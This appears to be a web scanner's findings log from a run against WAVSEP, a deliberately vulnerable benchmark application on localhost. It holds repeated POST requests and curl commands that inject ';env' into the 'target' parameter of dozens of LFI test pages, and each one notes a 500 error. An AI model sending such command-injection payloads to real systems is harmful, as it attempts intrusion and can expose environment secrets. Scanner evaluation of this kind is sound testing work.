POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
